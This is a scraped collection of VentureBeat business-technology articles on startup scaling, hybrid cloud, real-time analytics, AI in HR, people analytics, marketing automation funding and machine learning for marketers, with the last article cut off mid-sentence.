"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Guest 9 warning signs you aren’t ready to scale Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. For months, your team has been working at a breakneck pace to build and refine your product idea, with feedback from early adopters. It’s going well, but it’s been so. Much. Work. The team is in a dual state of exhaustion and excitement. User retention is growing. You’ve built a product that you’re sure people will love. Investors are taking notice and conversations are heading toward funding for the next stage. Success is on the horizon. It’s so close you can feel it. If this sounds like you, then congratulations! You’ve overcome major hurdles to get to this point. For many, the moment you get that funding starts a new clock: new features, new hires, new users. The next stage of growth. But have you really thought about what will happen when you double or triple your team size to meet growth demands? Do you have the right team now to support this growth? The right infrastructure? The right culture? Can your company successfully scale? VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! For early stage startups , warning signs pop up along the way but are often ignored. We say things like “culture doesn’t drive acquisition,” “it’s not important today,” or “we’ll deal with it when we get there.” I’ve watched startups churn their way through the transition between early-stage to growth stage. The ones that avoid long-term, critical missteps are the ones that start planning for their growth early and deliberately. They bet on their own success by prioritizing the work that will ensure the company is built to scale. If you’ve reached this important inflection point in the growth of your startup, pay attention to these warning signs that you may not be ready to scale: Your backlog is growing exponentially with technical debt. There is no easier way to tell that you will have long-term growth problems than a backlog of technical debt that you never seem to have time for. Technical debt is a normal, expected maintenance for any product and shouldn’t be put off on the back burner sprint after sprint. If you’re struggling with this problem, there’s likely two causes (sometimes both): You haven’t prioritized a sustainable process for maintaining this debt, or your product is unstable. You can address this by talking to your team directly and getting their feedback on how they feel about technical debt. Is this a prioritization issue due to unrealistic deadlines for features development? Give them the space to prioritize. Does the team feel the product infrastructure may be reaching its breaking point? Do an evaluation on pros and cons of a refactor versus a rewrite. During growth, your startup is slow to release features. If you’re slow to release features and improvements, you’ll frustrate teams and users alike. This is often a cultural problem of trying to solve too many things at once. If you haven’t already, you should follow best practices of continuous deployment, including breaking features down into small, valuable increments and getting things out to be tested as soon as possible. Fully embrace agile and iterative development now, not later. Your data is untrustworthy. Quantitative data isn’t useful early on. Suddenly, your product has enough users to make data useful. There is nothing more frustrating than not having confidence in the accuracy and integrity of the data coming out of your platform. This is a common problem for startups that don’t prioritize singular sources of truth on data and end up with conflicting, messy information that makes decision-making near impossible. So, how can you avoid this? Invest early in a customer data platform (CDP) like Segment that helps you collect, clean, and activate your customer data. Trust me, you will thank me later. You’re not staying focused on the measurements that actually matter. Yes, data is important when you start to scale. But it can also provide an overwhelming amount of information that makes it difficult to derive meaningful insights. This mountain of data ends up bogging down decision-making and distracting from what truly matters. Be clear about what data to measure and at which stage of growth. For most growing startups, the most important metric for a successful product is retention. It’s the best measure to understand that you’ve built a product people find useful and will fall in love with. Other metrics are necessary to sell investors, but do not lose sight of the fact that you’re building a product for your users. Without them, you won’t have a product that scales. You have more marketers than engineers. A surefire way to know you’re focused on the wrong metrics is that you have more marketers than engineers. Acquisition – getting new users to try your product – is much easier than getting them to stay and love your product. Hiring too many marketers early may increase your visibility, but it won’t help retention if your product can’t support the needs of its core adopters. If you see this imbalance on your team, then consider reallocating your dollars into building a healthy product team that can consistently ship features and keep user retention high. Until your company reaches later stages of growth, ensure you have enough engineers that the team is comfortable before investing more into marketing. You don’t have a formal product strategy. Nobody wants to take the time to write a formal product strategy. I get it. It takes time, it takes (sometimes frustrating levels of) collaboration. And the very nature of startups is that they pivot, making the work of creating a strategy feel pointless and futile at times. But I promise, it’s not. Smart product companies do this, even if they aren’t talking about it publicly. Have the diligence and fortitude during this growth transition to document your startup’s strategy and ensure your team understands it, can interrogate it and build from it. Your product team isn’t working cross-functionally. Many product startup organizational structures are built from resource or financial scarcity. Because of this, they build a product culture that is either highly engineering-centric or highly design-centric. Product management tends to be filled by the owner of the company, if it’s considered at all. In early stages this can work. But as the company grows, so does the need for maturity in the product team makeup. To improve cross-functional collaboration, reorient your product team leadership to consist of a product manager, an engineering lead, and a design lead (aka “the trio”). Each should be collaborating equally on decisions that ensure the technical needs, business needs and user needs are all considered as the product and its processes grow in maturity. You’re not writing things down. If your processes, culture and ways of working are all living in the spirit of the small team you currently work with, scaling will be painful. This works when a team is small, since people understand norms due to the very nature of how closely they work together. But when startup growth happens and departments naturally silo, this is impossible to maintain. Deliberate growth includes deliberate documentation of what matters to the company. Without it, cracks will form in the culture and become a much bigger problem down the road. “Just enough process” and “just enough documentation” are my two favorite mottos. Start writing down the most important things you want people to be accountable for: your values, processes, strategies. Over time, encourage team members to do the same. You don’t have a plan for your culture or organizational evolution. Once investor dollars hit, it’s going to be the second stage of high-paced work to hire up a team — sometimes two or three times its current size. If you don’t do this with a plan in mind, it can end up costing you exponentially in the long run. Culture can change drastically and cause conflicts among old and new employees. The team you currently have can feel alienated and frustrated with this growth. Leadership involvement needs to change to support a large company versus the small, tight-knit group it once was. You can either drive this culture intentionally or you can let it happen to you. Sit down with your current team and map out the future stage of the company. Talk about the culture. What do you want to keep? What do you want to change? How will roles change? Who will take on leadership roles as company ownership moves into more formal C-level leadership? Address the people in your startups’ excitement, fears and other emotions around this growth. Build a plan that everyone feels invested in. When people talk about startups, they often focus more on the challenges early-stage startups face — building the MVP, achieving product market fit, and securing investor funding. Understandable, right? Without passing this stage, there is no future, so there is good reason to stay focused on the here and now. But this tunnel vision can make the transition from seed to scale that much more painful and put even the greatest ideas at risk of failure. Data from the Small Business Administration shows that the failure rate of startups is around 90%, with 21.5% of startups failing in the first year, 30% in the second year, 50% in the fifth year, and 70% in their 10th year. Startups face a higher risk of failure as they grow. Don’t let short-sighted focus cause your team to lose sight of the long-term vision: a sustainable product and company that continues to thrive well beyond MVP. Summer Lamson is the chief services officer at DockYard , a digital product consultancy focused on helping innovative companies scale through the nexus of technology and design. DataDecisionMakers Welcome to the VentureBeat community! DataDecisionMakers is where experts, including the technical people doing data work, can share data-related insights and innovation. If you want to read about cutting-edge ideas and up-to-date information, best practices, and the future of data and data tech, join us at DataDecisionMakers. You might even consider contributing an article of your own! Read More From DataDecisionMakers The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! DataDecisionMakers Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,079
2,021
"New tools to make the hybrid cloud simpler and the cloud datacenter sustainable | VentureBeat"
"https://venturebeat.com/2021/12/07/new-tools-to-make-the-hybrid-cloud-simpler-and-the-cloud-datacenter-sustainable"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages New tools to make the hybrid cloud simpler and the cloud datacenter sustainable Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Over the past two years, the COVID-19 pandemic made remote working a top priority for many organizations, which were forced to enable employees to work from home to maintain productivity. As a consequence, these organizations began to heavily invest in on-demand computing resources for remote employees. As 2021 draws to a close, a wave of companies such as Liqid , Equinix , and Aryaka are developing solutions to support organizations in hybrid cloud setups , so they can move beyond the limitations of traditional datacenter technologies in order to optimize throughput and performance. And today saw three announcements that suggest how these companies intend to help enterprises become more streamlined. Today, digital infrastructure provider Liqid announced it had raised $100 million in series C funding from Lightrock and affiliates of DH Capital to further develop its composable infrastructure software platform, which enables businesses to configure and manage bare-metal servers with a software-defined approach. Digital infrastructure builder Equinix announced that it would be adding support for new hardware to its Equinix Metal service, essentially making a range of new Arm-based architecture and AI technology available to enterprises on-demand. And Aryaka announced new product options designed to support organizations in hybrid cloud environments. Liqid’s software-defined datacenters Liqid’s platform is designed to enable users to configure and deploy bare-metal servers in a matter of seconds, so they can allocate resources and increase operational efficiency. This software-driven approach means that users can reallocate resources in a way that’s much more flexible than the more rigid deployment options that traditional datacenter architectures offer. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! The release comes at a time when traditional datacenters have struggled to manage AI-centric workloads in a sustainable way. The intensive power and cooling requirements of AI workloads lead to excessive power consumption and generate high carbon emissions that are not only costly for enterprises, but damaging to the environment. In fact, researchers anticipate that by 2025, datacenters will account for the largest share of global electricity consumption in information and communications technology at 33%, almost as much as smartphones, networks, and TV combined (at 34% of electricity consumption). Software-defined innovations by providers like Liqid aim to make datacenters more sustainable by increasing utilization rates and using more efficient resources that require less power and cooling. Hybrid cloud tools from Equinix and Aryaka Equinix will provide enterprises with access to the latest AMD Milan , Ampere Altra , and Intel Ice Lake chipsets (anticipated to reach the market in early 2022), providing organizations with on-demand access to the most powerful hardware on the market. The service will enable organizations to build scalable-as-a-service offerings and gain immediate access to more processing power than they’d be able to with traditional datacenter technologies. The technology is already used by companies including Human, Solana Foundation, and Super League Gaming, which are leveraging it to build future-proof hybrid infrastructures and fulfill sustainability initiatives. It’s worth noting that Equinix’s on-demand AAS hardware approach is also helping to address supply chain challenges, like the global chip shortage that’s expected to continue until 2023 and is preventing many organizations from moving to next-gen hardware. Similar innovations are coming from providers like Aryaka , which today announced a range of new products designed to support organizations in hybrid cloud environments, including Aryaka SmartConnect Pro, a performance-optimized SD-WAN, and Aryaka SmartConnect, a cost-optimized SD-WAN. This new suite of products provides organizations deploying SD-WAN and SASE architectures with cost-effective pricing models, so they have access to hardware with the performance they need to power critical business services. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,080
2,021
"Real-time analytics in 2022: What to expect? | VentureBeat"
"https://venturebeat.com/2021/12/31/real-time-analytics-in-2022-what-to-expect"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Real-time analytics in 2022: What to expect? Share on Facebook Share on X Share on LinkedIn Sports analytics Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Today, every company is in the process of becoming a data company. Decision-makers leverage data not just to see how their organization performed in the past few months, but also to generate detailed insights (the what and why) into business processes, operations. These analytics, driven by tools such as Tableau , inform business decisions and strategies and play a crucial role in driving efficiencies, improving financial performance, and identifying new revenue sources. A few years ago, business data used to be processed in batches for analytics. Now, real-time analytics has come on the block, where organizational data is processed and queried as soon as it is created. In some cases, the action is not taken instantly, but a few seconds or minutes after the arrival of new data. However, both the practices are increasingly being adopted by enterprises, especially in sectors where the need is to analyze data immediately to deliver products or services, understand trends, and take on rivals. After all, an ecommerce company would need instant information about when and why its payment gateway went down to ensure customer experience and retention. In the case of historic data analyzed in batches, the detection and resolution of such an issue could easily get delayed. Here are some trends that will shape and drive the adoption of real-time analytics further in 2022. Surge in data volumes, velocity Continuing the trend from recent years, data volumes and velocity at the organization level will follow the upward trajectory, surging more than ever before. This, combined with the convergence of data lakes and warehouses and the need to take quick decisions, is expected to drive improvements in the response time on real-time analytics. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Systems will be able to ingest massive amounts of incoming raw data – no matter whether it peaks for a few hours every day or for a few weeks every year – without latency and faster analytical queries are likely to become possible, ensuring instant reactions to events and maximum business value. On top of that, serverless real-time analytics platforms are also expected to go mainstream, which will allow organizations to build and operate data-centric applications with infinite on-demand scaling to handle the sudden influx of data from a particular source. “Overall, 2022 will be a challenging year for keeping up with growing data volumes and performance expectations in data analytics,” Chris Gladwin, the CEO, and cofounder of Ocient , told Venturebeat. “We will see more organizations looking for continuous analytics and higher resolution query results on hyperscale data sets (trillions of records) to gain deeper, more comprehensive insights from an ever-growing volume and diversity of data sources.” Rise in developer demand As the lines between real-time analytics (which provides instant insights to humans to make decisions) and real-time analytical applications (which automatically take decisions as events happen) continue to blur on the back of the democratization of real-time data, developers are expected to join technical decision-makers and analysts as the next big adopter of real-time analytics. According to a report from Rockset , which offers a real-time analytics database, real-time data analytics will see a sharp rise in demand from devs who will use the technology to build data-driven apps capable of personalizing content/customer services as well as to A/B test quickly, detect fraud, and serve other intelligent applications like automating operational processes. “Every other business is now feeling the pressure to take advantage of real-time data to provide instant, personalized customer service, automate operational decision-making, or feed ML models with the freshest data. Businesses that provide their developers [with] unfettered access to real-time data in 2022, without requiring them to be data engineering heroes, will leap ahead of laggards and reap the benefits,” Dhruba Borthakur, cofounder and CTO of Rockset, said. Off-the-shelf real-time analytics capabilities In 2022 and beyond, real-time analytics based on off-the-shelf capabilities are expected to become more mainstream, easier to deploy, and customize, Donald Farmer, the principal of Treehive Strategy, told Venturebeat. This will be a departure from the current practice where the code is written in-house or sourced from highly specialized vendors and drive the adoption of real-time analytics in retail, healthcare, and the public sector. So far, real-time analytics based on off-the-shelf capabilities has mostly been used in sectors such as transport (for customer support) and manufacturing (for monitoring production), Farmer noted. Professionally, Farmer has worked on several of the top data and analytics technologies in the market. Additionally, he previously led design and innovation teams at Microsoft and Qlik. Business benefits across sectors Business benefits of real-time analytics, regardless of the sector, will also continue to drive adoption in 2022. As per IDC’s Future Enterprise Resiliency and Spending survey, the ability to make real-time decisions will make enterprises more nimble, boost their customer loyalty/outreach, and offer a significant advantage over the competition. Plus, continuous data analytics, which alerts users as events happen, would help towards improving supply chains and reducing costs, bringing about fast ROI on streaming data pipeline investments. As per Rockset , one oil and gas company was able to increase its profit margins by 12% to 15% after adopting real-time analytics. Meike Escherich, associate research director for European Future of Work at IDC, notes they have already recorded a significant uptake in the implementation of real-time analytics, with one in three European companies either already using them for measuring team performances or planning to do so in the next 18 months. Similarly, Gartner too predicts that more than half of major new business systems will incorporate continuous data intelligence in 2022. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,081
2,021
"AI-driven HR seeks to balance 'human' and 'resources' | VentureBeat"
"https://venturebeat.com/2021/08/02/ai-driven-hr-seeks-to-balance-human-and-resources"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages AI-driven HR seeks to balance ‘human’ and ‘resources’ Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Human resources (HR) is an area that is ripe for automation, and in particular, the kind of automation made possible by artificial intelligence (AI). HR, after all, is a cost center at most organizations, which means organizations are always looking for ways to keep costs as low as possible. And yet, HR is rife with complex, time-consuming processes that, so far, have required the unique logic and intuitive thinking that only humans can provide. A New World But all that is changing with the newest generations of AI-driven HR platforms. Globality’s Sonia Mathai notes that everything from hiring and onboarding to scheduling and benefits management, and all the way to termination and access control, AI is creating a new brand of HR that is leaner, more accurate, and less costly than traditional HR. For one thing, she says, AI-driven HR is available 24/7, delivering user-friendly services via fully conversational chatbots that provide immediate responses to most questions with no wait-listing. At the same time, AI can provide a more personalized experience due to its access to real-time data. And as seen with AI in other business units, all of this allows human reps to shed the rote, repetitive aspects of the job to focus on more creative, strategic solutions to endemic issues. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! HR is such an important function at most companies that it should not be deployed lightly or haphazardly, according to Thirdera CIO Jeff Gregory. In a recent interview with Venture Beat , he pointed out that HR acts as the “steward of a company” and maintains the pulse of the health and development of employees. So it must consistently present the right information even when employees do not ask the right questions. For this reason, AI must learn the ins and outs of HR processes and resource utilization just like any employee, which is why it is best for it to start small and then work its way up to more complicated and consequential functions. Be careful that AI doesn’t get you into legal trouble as well, says Eric Dunleavy, director of litigation and employment services at DCI Consulting Group, and Michelle Duncan, an attorney with Jackson Lewis. It’s one thing to use AI to prescreen applications, evaluate interviews, and mine social media. It’s quite another to have it decide who gets hired or promoted, particularly with the numerous examples of AI showing bias in regards to race, gender, age, and other factors. In the end, it is up to the company to ensure that all employees, whether human or digital, abide by established laws like Title VII of the Civil Rights Act, the Age Discrimination in Employment Act, and the Americans with Disabilities Act. Crunching Numbers Perhaps the most profound impact AI will have on HR is in analytics, rather than hiring or employee self-service tools. At its heart, HR is a numbers game, according to Erik van Vulpen, founder of the AIHR Academy , and AI is a whiz with numbers. For instance, AI can delve deep into turnover data to divine why employees are leaving and what can be done to correct it. As well, AI can assess the impact of learning and development programs, or determine which new hires will become top performers. Ultimately, this will replace the “gut feeling” approach to decision-making in traditional HR shops to one that is more data-driven and quantifiable. It’s been said that employees are the enterprise’s most valuable resource. In this case, organizations should proceed with caution when deciding how quickly and how thoroughly they want to integrate AI into their HR processes. People who take their jobs seriously might not maintain that attitude if they feel they cannot get a fair shake from an algorithm. The best way to avoid this is to ensure that AI is trained to deliver positive outcomes, preferably ones that benefit the individual and the organization alike. If this is not possible, then there should be mechanisms in place, either human-driven or artificial, explaining why a given result has emerged and what the employee may do to alter it. In the end, we all want to be treated fairly no matter who, or what, is making the decisions. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,082
2,012
"Analyze this: Talent Analytics quantifies you | VentureBeat"
"https://venturebeat.com/2012/08/21/talentanalytics-quantifies-you/amp"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Analyze this: Talent Analytics quantifies you Share on Facebook Share on X Share on LinkedIn Talent Analytics measures people, weighing their preferences and motivations and how those characteristics predict job performance. "Our niche is companies who have employees," jokes founder Greta Roberts. Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Talent Analytics measures people, weighing their preferences and motivations and how those characteristics predict job performance. “Our niche is companies who have employees,” jokes founder Greta Roberts. The company surveys employees and summarizes them in 12 numbers that cover work style (“What kind of tasks do you prefer? Are you detailed-oriented? Collaborative?) and motivators like creativity, bottom-line, or a sense of mission. These “talent characteristics” are not skills, which are specific to a field and change over time, but rather innate traits. Companies can the map the data to performance and use it for hiring or to help build complementary teams. Roberts insists that far from dehumanizing employees, talent characteristics highlight their value. “Numbers are the language of business, ” Roberts explains, “and people are also numbers — but not only numbers. We have a weight and a height; That doesn’t make us less human.” Companies often trumpet their people as their greatest asset and yet rarely seem to put much effort into quantifying that asset. “People become confident when you value who they are, and they are doing things that they do well naturally,” Roberts told me, “You also start seeing people who haven’t been seen before.” A group of 250 accountants, whose data is shown below, liked rules and routine (shock!), were competitive, detail-oriented, and focused on the bottom line. Clients initially found them cold, but their talent characteristics showed that they were simply seeking information before warming up. Knowing your people can also help reframe a company’s vision of itself. One Talent Analytics customer, a forklift operator firm, constantly received complaints about customer service. The operators were not friendly, but as it turned out, they were very focused on accuracy. So the company started to highlight accuracy as its main selling point rather than trying to transform the personalities of its staff. The process can also throw up surprises. Call centers instinctively hire staff who are warm and friendly, but the Talent Analytics analysis showed that the top performers didn’t actually meet this profile. Callers wanted a listener, not a talker, and employees who were too friendly stayed on the line for too long. The main performance metric in a call center is how many calls you process. Talent Analytics isn’t the only company experimenting with data-driven HR. Google’s people-analytics team , a hodgepodge of data miners, psychologists and MBAs, uses data to drive decisions on compensation, talent management, hiring, and other HR issues. One of the team’s better known endeavours is Project Oxygen, Google’s quest to build a better boss , or at least identify what makes a good one. Roberts doesn’t name any direct competitors. “Our biggest competitor is people not doing anything,” she says. While there are various talent and analytics packages available that solve part of the puzzle, she says Talent Analytics is the only one which makes it easy to map people’s intrinsic characteristics on to performance. As Malcolm Forbes once said “To measure the man, measure his heart.” Talent Analytics is based in Cambridge, Mass., has 10 emloyees, is privately funded, and was founded in 2002. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,083
2,020
"SendinBlue raises $160 million to automate repetitive marketing tasks | VentureBeat"
"https://venturebeat.com/2020/09/30/sendinblue-raises-160-million-to-automate-repetitive-marketing-tasks/amp"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages SendinBlue raises $160 million to automate repetitive marketing tasks Share on Facebook Share on X Share on LinkedIn Are you looking to showcase your brand in front of the brightest minds of the gaming industry? Consider getting a custom GamesBeat sponsorship. Learn more. Marketing automation startup SendinBlue today announced a $160 million funding round. A company spokesperson says the money will be put toward accelerating go-to-market efforts as it adapts to growth during the pandemic. Lockdowns and shelter-in-place orders aimed at beating back the novel coronavirus have forced marketers to fully embrace digital. According to a report published by The CMO Survey, some 60.8% of respondents indicated they’ve “shifted resources to building customer-facing digital interfaces” and 56.2% transformed their businesses to focus on digital opportunities. Moreover, marketers reported customers’ increased openness to digital offerings introduced during the pandemic and said they were likely to see greater value in digital experiences. SendinBlue, which was cofounded by Polytechnique graduate Armand Thiberge in 2012, competes with companies like Mailchimp and offers solutions aimed at expediting common marketing tasks. Initially focused on email, the company pivoted to address businesses’ increased demand for online acquisition and loyalty tools. Using its pipelines, clients can start by sending newsletters before diving deeper with templates and chat tools that tie into their websites. SendinBlue says these products were designed to be easy for marketers to use and are aimed at companies in industries like hospitality, construction, ecommerce, and manufacturing. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! SendinBlue’s platform provides a range of email, SMS, and chat messaging tools, as well as integrations with existing customer relationship management systems. Via transactional email and segmentation, customers can set up the design, engagement, and discoverability of messages and send messages in a more targeted way. With landing pages, signup forms, and retargeting, those customers can create more targeted visitor experiences and grow their email contact list while showing ads to websites visitors as they browse other websites. But SendinBlue’s real differentiator lies in automation. Leveraging AI and machine learning, the company’s MailClark email bot extracts relevant content from emails, prequalifies them, and handles specific actions to optimize response time. Customers can use MailClark within the platform or integrate it with third-party apps via an API. SendinBlue claims it achieved 60% year-over-year growth even before the pandemic. But between March and June, the company saw a 50% uptick in business and reached more than 180,000 customers across over 160 countries. With 70% of SendinBlue’s revenue coming from abroad, Thiberge says he now plans to focus on international expansion. The startup recently opened its first office in Toronto, bringing its total number of offices to five and its headcount to over 400. SendinBlue raised $33 million in September 2017. This latest round, which was led by Bridgepoint Development Capital and BPI, brings the startup’s total raised to nearly $200 million. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,084
2,022
"How machine learning frees up creativity and strategy for marketers | VentureBeat"
"https://venturebeat.com/2022/04/09/how-machine-learning-frees-up-creativity-and-strategy-for-marketers/amp"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Community How machine learning frees up creativity and strategy for marketers Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Artificial intelligence (AI) and machine learning (ML) have been massively hyped over the years. These days it seems every company is an AI/ML company — and reality is, as American researcher, scientist, and futurist Roy Amara, stated, “We tend to overestimate the effect of a technology in the short run and underestimate the effect in the long run.” When a new technology is developed or deployed, people often talk about it suddenly transforming everything in the next couple of years. However, we also tend to underestimate the effect of it entirely, especially if it is the kind of technology that could fundamentally change the way we solve marketers’ problems and interact with customers. If we’re going to leverage the full benefits of AI and ML, it’s important to first understand the technology and discern between the facts and fiction of how it works today. Only then can we understand what is real, how this technology can be transformative, and how machine learning and AI can free up creativity and strategic thinking for marketers. Machine learning starts with data Without the ability to analyze data, identify patterns, and put it to use, data is effectively useless. Machines are ruthless optimizers that can organize data on a level that is impossible for humans to replicate. However, this also works in reverse, as machines today cannot replicate the creative thinking and strategies that humans can generate and act on. The data optimized through the machine with machine learning provides marketers with a supercharged ability to make the most informed decisions and then enact a creative strategy to achieve their desired outcome. Machine learning for marketers: Asking the right questions The things that matter to companies and to individuals are decisions and actions. Back when I used to consult large companies spending millions or tens of millions on “data strategy” or equally poorly defined areas, I would often advise that before they start to worry about the data they need to collect, they need to start with what decisions and actions they need to take as a business. Starting from that perspective, businesses can ask themselves: What decisions do you wish you could make smarter and faster? Are you structurally set up as an organization to make those decisions? Once those are defined, you can then ask questions like, what information do I need to make these decisions faster and smarter? And which of these decisions can be automated? VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! So, where does machine learning come in? Which category of problems can it help us with? In order to answer these questions, it is first useful to understand the limitations of this technology. ML does not replicate the amazing generality and adaptability of human intelligence — instead (and consistently with other technologies) it augments human intelligence and solves a more specific set of problems with superhuman capability. To work out 